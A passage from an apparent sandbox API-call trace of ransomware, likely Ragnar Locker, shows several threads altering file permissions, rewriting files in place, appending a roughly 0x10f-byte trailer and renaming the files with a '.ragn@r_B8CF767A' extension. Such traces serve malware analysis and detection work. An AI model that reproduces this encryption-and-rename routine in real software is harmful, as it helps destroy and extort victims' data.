lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.ragn@r_B8CF767A" [0167.396] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\Logs\\PartnerSetupCompleteResult.log.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\logs\\partnersetupcompleteresult.log.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 179 os_tid = 0xdfc [0168.018] GetNamedSecurityInfoW () returned 0x0 [0168.020] SetEntriesInAclW () returned 0x0 [0168.021] SetNamedSecurityInfoW () returned 0x0 [0168.022] LocalFree (hMem=0x35931a0) returned 0x0 [0168.022] LocalFree (hMem=0x35931b4) returned 0x35931b4 [0168.022] LocalFree (hMem=0x3540c78) returned 0x0 [0168.022] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini")) returned 0x20 [0168.023] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3c8 [0168.023] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x5fffd88 | out: lpFileSize=0x5fffd88*=156) returned 1 [0168.023] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.023] GetProcessHeap () returned 0x3520000 [0168.023] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584c28 [0168.023] ReadFile (in: hFile=0x3c8, lpBuffer=0x3584c28, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5fffd40, lpOverlapped=0x0 | out: lpBuffer=0x3584c28*, lpNumberOfBytesRead=0x5fffd40*=0xf, lpOverlapped=0x0) returned 1 [0168.025] VirtualAlloc (lpAddress=0x0, dwSize=0x9c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0168.025] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.025] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffd5c | out: lpNewFilePointer=0x0) returned 1 [0168.025] ReadFile (in: hFile=0x3c8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x9c, lpNumberOfBytesRead=0x5fffd30, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5fffd30*=0x9c, lpOverlapped=0x0) returned 1 [0168.026] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffd34 | out: lpNewFilePointer=0x0) returned 1 [0168.026] LockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9c, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.026] WriteFile (in: hFile=0x3c8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x9c, lpNumberOfBytesWritten=0x5fffd2c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5fffd2c*=0x9c, lpOverlapped=0x0) returned 1 [0168.026] UnlockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9c, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.026] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.027] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x9c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.027] LockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.027] WriteFile (in: hFile=0x3c8, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffd6c, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5fffd6c*=0x100, lpOverlapped=0x0) returned 1 [0168.027] WriteFile (in: hFile=0x3c8, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffd6c, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5fffd6c*=0x100, lpOverlapped=0x0) returned 1 [0168.028] WriteFile (in: hFile=0x3c8, lpBuffer=0x5fffd70*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5fffd6c, lpOverlapped=0x0 | out: lpBuffer=0x5fffd70*, lpNumberOfBytesWritten=0x5fffd6c*=0xf, lpOverlapped=0x0) returned 1 [0168.028] UnlockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.028] GetProcessHeap () returned 0x3520000 [0168.029] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584c28 | out: hHeap=0x3520000) returned 1 [0168.029] CloseHandle (hObject=0x3c8) returned 1 [0168.034] lstrcpyW (in: lpString1=0x5fff8dc, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" [0168.034] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.ragn@r_B8CF767A" [0168.034] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 180 os_tid = 0x738 [0168.251] GetNamedSecurityInfoW () returned 0x0 [0168.252] SetEntriesInAclW () returned 0x0 [0168.252] SetNamedSecurityInfoW () returned 0x0 [0168.253] LocalFree (hMem=0x35931a0) returned 0x0 [0168.253] LocalFree (hMem=0x35931b4) returned 0x35931b4 [0168.254] LocalFree (hMem=0x3540c78) returned 0x0 [0168.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd")) returned 0x20 [0168.254] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f4 [0168.254] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x5fffbac | out: lpFileSize=0x5fffbac*=577) returned 1 [0168.254] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x232, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.254] GetProcessHeap () returned 0x3520000 [0168.254] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584c28 [0168.254] ReadFile (in: hFile=0x3f4, lpBuffer=0x3584c28, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5fffb64, lpOverlapped=0x0 | out: lpBuffer=0x3584c28*, lpNumberOfBytesRead=0x5fffb64*=0xf, lpOverlapped=0x0) returned 1 [0168.257] VirtualAlloc (lpAddress=0x0, dwSize=0x241, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0168.258] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.258] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffb80 | out: lpNewFilePointer=0x0) returned 1 [0168.258] ReadFile (in: hFile=0x3f4, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x241, lpNumberOfBytesRead=0x5fffb54, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5fffb54*=0x241, lpOverlapped=0x0) returned 1 [0168.258] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffb58 | out: lpNewFilePointer=0x0) returned 1 [0168.258] LockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x241, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.259] WriteFile (in: hFile=0x3f4, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x5fffb50, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5fffb50*=0x241, lpOverlapped=0x0) returned 1 [0168.259] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x241, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.259] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.260] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x241, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.260] LockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.260] WriteFile (in: hFile=0x3f4, lpBuffer=0x5d2cfc4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffb90, lpOverlapped=0x0 | out: lpBuffer=0x5d2cfc4*, lpNumberOfBytesWritten=0x5fffb90*=0x100, lpOverlapped=0x0) returned 1 [0168.260] WriteFile (in: hFile=0x3f4, lpBuffer=0x5d2d0c4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffb90, lpOverlapped=0x0 | out: lpBuffer=0x5d2d0c4*, lpNumberOfBytesWritten=0x5fffb90*=0x100, lpOverlapped=0x0) returned 1 [0168.260] WriteFile (in: hFile=0x3f4, lpBuffer=0x5fffb94*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5fffb90, lpOverlapped=0x0 | out: lpBuffer=0x5fffb94*, lpNumberOfBytesWritten=0x5fffb90*=0xf, lpOverlapped=0x0) returned 1 [0168.260] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.260] GetProcessHeap () returned 0x3520000 [0168.261] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584c28 | out: hHeap=0x3520000) returned 1 [0168.261] CloseHandle (hObject=0x3f4) returned 1 [0168.264] lstrcpyW (in: lpString1=0x5fff700, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" [0168.264] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.ragn@r_B8CF767A" [0168.264] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 181 os_tid = 0xcb8 [0168.275] GetNamedSecurityInfoW () returned 0x0 [0168.276] SetEntriesInAclW () returned 0x0 [0168.276] SetNamedSecurityInfoW () returned 0x0 [0168.277] LocalFree (hMem=0x35931a0) returned 0x0 [0168.277] LocalFree (hMem=0x35931b4) returned 0x35931b4 [0168.277] LocalFree (hMem=0x3540c78) returned 0x0 [0168.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 0x20 [0168.277] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f4 [0168.277] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x627f9a8 | out: lpFileSize=0x627f9a8*=74) returned 1 [0168.277] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.277] GetProcessHeap () returned 0x3520000 [0168.277] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584c28 [0168.278] ReadFile (in: hFile=0x3f4, lpBuffer=0x3584c28, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x627f960, lpOverlapped=0x0 | out: lpBuffer=0x3584c28*, lpNumberOfBytesRead=0x627f960*=0xf, lpOverlapped=0x0) returned 1 [0168.279] VirtualAlloc (lpAddress=0x0, dwSize=0x4a, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0168.279] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.279] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x627f97c | out: lpNewFilePointer=0x0) returned 1 [0168.279] ReadFile (in: hFile=0x3f4, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x4a, lpNumberOfBytesRead=0x627f950, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x627f950*=0x4a, lpOverlapped=0x0) returned 1 [0168.280] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x627f954 | out: lpNewFilePointer=0x0) returned 1 [0168.280] LockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4a, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.280] WriteFile (in: hFile=0x3f4, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x627f94c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x627f94c*=0x4a, lpOverlapped=0x0) returned 1 [0168.280] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.280] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.280] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.281] LockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.281] WriteFile (in: hFile=0x3f4, lpBuffer=0x5d3a13c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x627f98c, lpOverlapped=0x0 | out: lpBuffer=0x5d3a13c*, lpNumberOfBytesWritten=0x627f98c*=0x100, lpOverlapped=0x0) returned 1 [0168.281] WriteFile (in: hFile=0x3f4, lpBuffer=0x5d3a23c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x627f98c, lpOverlapped=0x0 | out: lpBuffer=0x5d3a23c*, lpNumberOfBytesWritten=0x627f98c*=0x100, lpOverlapped=0x0) returned 1 [0168.281] WriteFile (in: hFile=0x3f4, lpBuffer=0x627f990*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x627f98c, lpOverlapped=0x0 | out: lpBuffer=0x627f990*, lpNumberOfBytesWritten=0x627f98c*=0xf, lpOverlapped=0x0) returned 1 [0168.281] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.281] GetProcessHeap () returned 0x3520000 [0168.281] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584c28 | out: hHeap=0x3520000) returned 1 [0168.281] CloseHandle (hObject=0x3f4) returned 1 [0168.286] lstrcpyW (in: lpString1=0x627f4fc, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" [0168.286] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd.ragn@r_B8CF767A" [0168.286] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\preoobe.cmd.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 183 os_tid = 0x2bc [0168.492] GetNamedSecurityInfoW () returned 0x0 [0168.493] SetEntriesInAclW () returned 0x0 [0168.494] SetNamedSecurityInfoW () returned 0x0 [0168.494] LocalFree (hMem=0x35931a0) returned 0x0 [0168.495] LocalFree (hMem=0x35931b4) returned 0x35931b4 [0168.495] LocalFree (hMem=0x3590748) returned 0x0 [0168.495] GetFileAttributesW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd")) returned 0x20 [0168.495] CreateFileW (lpFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f4 [0168.495] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x5fffa34 | out: lpFileSize=0x5fffa34*=307) returned 1 [0168.495] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x124, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.495] GetProcessHeap () returned 0x3520000 [0168.495] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584c28 [0168.496] ReadFile (in: hFile=0x3f4, lpBuffer=0x3584c28, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5fff9ec, lpOverlapped=0x0 | out: lpBuffer=0x3584c28*, lpNumberOfBytesRead=0x5fff9ec*=0xf, lpOverlapped=0x0) returned 1 [0168.497] VirtualAlloc (lpAddress=0x0, dwSize=0x133, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0168.499] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.499] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffa08 | out: lpNewFilePointer=0x0) returned 1 [0168.499] ReadFile (in: hFile=0x3f4, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x133, lpNumberOfBytesRead=0x5fff9dc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5fff9dc*=0x133, lpOverlapped=0x0) returned 1 [0168.499] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fff9e0 | out: lpNewFilePointer=0x0) returned 1 [0168.499] LockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x133, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.499] WriteFile (in: hFile=0x3f4, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x133, lpNumberOfBytesWritten=0x5fff9d8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5fff9d8*=0x133, lpOverlapped=0x0) returned 1 [0168.500] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x133, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.500] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0168.500] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x133, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.501] LockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.501] WriteFile (in: hFile=0x3f4, lpBuffer=0x5d472b4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffa18, lpOverlapped=0x0 | out: lpBuffer=0x5d472b4*, lpNumberOfBytesWritten=0x5fffa18*=0x100, lpOverlapped=0x0) returned 1 [0168.501] WriteFile (in: hFile=0x3f4, lpBuffer=0x5d473b4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5fffa18, lpOverlapped=0x0 | out: lpBuffer=0x5d473b4*, lpNumberOfBytesWritten=0x5fffa18*=0x100, lpOverlapped=0x0) returned 1 [0168.502] WriteFile (in: hFile=0x3f4, lpBuffer=0x5fffa1c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5fffa18, lpOverlapped=0x0 | out: lpBuffer=0x5fffa1c*, lpNumberOfBytesWritten=0x5fffa18*=0xf, lpOverlapped=0x0) returned 1 [0168.502] UnlockFile (hFile=0x3f4, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0168.502] GetProcessHeap () returned 0x3520000 [0168.502] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584c28 | out: hHeap=0x3520000) returned 1 [0168.502] CloseHandle (hObject=0x3f4) returned 1 [0168.504] lstrcpyW (in: lpString1=0x5fff588, lpString2="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" [0168.504] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.ragn@r_B8CF767A") returned="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.ragn@r_B8CF767A" [0168.504] MoveFileExW (lpExistingFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), lpNewFileName="\\\\?\\C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.ragn@r_B8CF767A" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 185 os_tid = 0x440 [0168.984] GetNamedSecurityInfoW () returned 0x0 [0168.984] SetEntriesInAclW () returned 0x0 [0168.984] SetNamedSecurityInfoW () returned 0x0 [0168.985] LocalFree (hMem=0x35cd880) returned 0x0 [0168.985] LocalFree (hMem=0x35cd894) returned 0x35cd894 [0168.985] LocalFree (hMem=0x3592eb0) returned 0x0 [0168.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf")) returned 0x20 [0168.985] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1025\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3c8 [0168.985] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x5fffe78 | out: lpFileSize=0x5fffe78*=7567) returned 1 [0168.985] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x1d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.986] GetProcessHeap () returned 0x3520000 [0168.986] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b08 [0168.986] ReadFile (in: hFile=0x3c8, lpBuffer=0x3584b08, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5fffe30, lpOverlapped=0x0 | out: lpBuffer=0x3584b08*, lpNumberOfBytesRead=0x5fffe30*=0xf, lpOverlapped=0x0) returned 1 [0168.987] VirtualAlloc (lpAddress=0x0, dwSize=0x1d8f, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0168.989] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.989] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffe4c | out: lpNewFilePointer=0x0) returned 1 [0168.989] ReadFile (in: hFile=0x3c8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x1d8f, lpNumberOfBytesRead=0x5fffe20, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5fffe20*=0x1d8f, lpOverlapped=0x0) returned 1 [0168.990] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5fffe24 | out: lpNewFilePointer=0x0) returned 1 [0168.990] LockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1d8f, nNumberOfBytesToLockHigh=0x0) returned 1 [0168.990] WriteFile (in: hFile=0x3c8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x1d8f, lpNumberOfBytesWritten=0x5fffe1c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5fffe1c*=0x1d8f, lpOverlapped=0x0) returned 1 [0168.991] UnlockFile (hFile=0x3c8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1d8f, 